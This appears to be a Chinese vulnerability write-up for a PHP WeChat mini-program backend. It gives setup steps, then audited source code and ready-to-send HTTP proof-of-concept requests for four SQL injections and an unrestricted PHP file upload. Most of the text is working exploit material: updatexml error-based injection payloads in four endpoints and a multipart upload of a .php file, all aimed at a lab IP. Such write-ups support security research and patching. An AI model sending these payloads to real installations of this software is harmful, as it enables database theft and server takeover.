环境搭建
链接: https://pan.baidu.com/s/1SXPImEWDUgWUDjgbngNCfg?pwd=hy9r 提取码: hy9r导入sql
新建数据库,将root1.sql导入数据库
配置路由
.htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?s=$1 [QSA,L]
</IfModule>sql注入1 doPageGuigeInfo 函数
C:\Penetration\TrafficTools\phpStudy\WWW\wn\application\api\controller\Mainwxapp.php
public function doPageGuigeInfo()
{
$uniacid = input("uniacid");
$str = input('str');
$arr = explode("######", $str);
$id = input('id');
$where = "";
foreach ($arras$key => &$res) {
$vv = $key + 1;
$where .= " and type" . $vv . " = " . "'" . $res . "'";
}
$proinfo = Db::query("SELECT * FROM {$this->prefix}wd_xcx_duo_products_type_value WHERE pid= " . $id . $where);
foreach ($proinfoas$key => &$value) {
if($value['thumb']){
$value['thumb'] = remote($uniacid, $value['thumb'], 1);
}
$value['salenum']=$value['salenum']+$value["vsalenum"];
}
$baseinfo = Db::name('wd_xcx_products')->where("id", $proinfo[0]['pid'])->find();
if($baseinfo['thumb']){
$baseinfo['thumb'] = remote($uniacid, $baseinfo['thumb'], 1);
}
if($baseinfo['shareimg']){
$baseinfo['shareimg'] = remote($uniacid, $baseinfo['shareimg'], 1);
}
$adata['proinfo'] = $proinfo[0];
$adata['baseinfo'] = $baseinfo;
$result['data'] = $adata;
returnjson_encode($result);
}在doPageGuigeInfo函数中,使用了input接收一个id传入的值,在sql语句中拼接了.$id 导致sql注入漏洞
POST /api/mainwxapp/doPageGuigeInfo HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Host: 192.168.18.137
Origin: http://192.168.18.137
Referer: http://192.168.18.137/api/mainwxapp/doPageGuigeInfo
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
uniacid=1&str=1&id=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -sql注入2 over_arr 函数
C:\Penetration\TrafficTools\phpStudy\WWW\wn\application\api\controller\Wxapps.php
public function over_arr($uniacid)
{
$prefix = config('database.prefix');
$over_arr = Db::query("SELECT id FROM {$prefix}wd_xcx_bargain_bargain_order WHERE uniacid = " . $uniacid . " AND overtime < " . time() . " and flag < 3");
foreach ($over_arr as $key => $value) {
Db::name("wd_xcx_bargain_bargain_order")->where('id', $value['id'])->update(array('flag' => 4));
}
}POST /api/wxapps/over_arr HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Host: 192.168.18.137
Origin: http://192.168.18.137
Referer: http://192.168.18.137/api/mainwxapp/doPageGuigeInfo
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
uniacid=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -sql注入3 doPageGetFoodKcPrice 函数
C:\Penetration\TrafficTools\phpStudy\WWW\wn\application\api\controller\Wxapps.php
public function doPageGetFoodKcPrice()
{
$id = input("id");
$guige_chooseed = input("guige_chooseed");
$guige = explode(',', $guige_chooseed);
$where = "";
if (count($guige) == 3) {
$where = " and type1 = '" . $guige[0] . "' and type2 = '" . $guige[1] . "' and type3 = '" . $guige[2] . "'";
} elseif (count($guige) == 2) {
$where = " and type1 = '" . $guige[0] . "' and type2 = '" . $guige[1] . "'";
} elseif (count($guige) == 1) {
$where = " and type1 = '" . $guige[0] . "'";
}
$prefix = config('database.prefix');
$sql = "SELECT * FROM {$prefix}wd_xcx_food_type_value WHERE pid = " . $id . $where;
$guige_arr = Db::query($sql);
$result['data'] = [];
if (count($guige_arr) > 0) {
$result['data'] = $guige_arr[0];
$result['data']['flag'] = 1;
} else {
$result['data']['flag'] = 2;
}
returnjson_encode($result);
}POST /api/wxapps/doPageGetFoodKcPrice HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Host: 192.168.18.137
Origin: http://192.168.18.137
Referer: http://192.168.18.137/api/wxapps/doPageGetFoodKcPrice
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
guige_chooseed=1&id=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -sql注入4 doPageptpinfo
C:\Penetration\TrafficTools\phpStudy\WWW\wn\application\api\controller\Wxapps.php
public function doPageptpinfo()
{
$uniacid = input("uniacid");
$str = input("str");
$types = input("types");
$id = input("id");
$arr = explode("/", $str);
$where = "";
foreach ($arras$key => &$res) {
$vv = $key + 1;
$where .= " and type" . $vv . " = " . "'" . $res . "'";
}
$prefix = config('database.prefix');
$proinfo = Db::query("SELECT * FROM {$prefix}wd_xcx_pt_pro_val WHERE pid = " . $id . $where . " limit 1");
$baseinfo = Db::name('wd_xcx_pt_pro')->where('id', $id)->find();
if ($baseinfo['thumb']) {
$baseinfo['thumb'] = remote($uniacid, $baseinfo['thumb'], 1);
}
$adata['proinfo'] = $proinfo[0];
if ($adata['proinfo']['thumb']) {
$adata['proinfo']['thumb'] = remote($uniacid, $adata['proinfo']['thumb'], 1);
}
$adata['baseinfo'] = $baseinfo;
$result['data'] = $adata;
returnjson_encode($result);
}POST /api/wxapps/doPageptpinfo HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 119
Content-Type: application/x-www-form-urlencoded
Host: 192.168.18.137
Origin: http://192.168.18.137
Referer: http://192.168.18.137/api/wxapps/doPageGetFoodKcPrice
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
uniacid=1&str=1&types=1&id=1 AND updatexml(rand(),concat(CHAR(126),md5(1),CHAR(126)),null)-- -任意文件上传漏洞 onepic_uploade
C:\Penetration\TrafficTools\phpStudy\WWW\wn\application\comadmin\controller\Remote.php
function onepic_uploade($file){
$thumb = request()->file($file);
if(isset($thumb)){
$dir = upload_img();
$info = $thumb->move($dir);
if($info){
$imgurl = ROOT_HOST."/upimages/".date("Ymd",time())."/".$info->getFilename();
return $imgurl;
}
}
}POST /comadmin/remote/onepic_uploade?file=file HTTP/1.1
Host: 192.168.18.137
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHiiBqD34nYQSt7EB
Content-Length: 141
------WebKitFormBoundaryHiiBqD34nYQSt7EB
Content-Disposition: form-data; name="file";filename="1.php"
<?php phpinfo();?>
------WebKitFormBoundaryHiiBqD34nYQSt7EB--
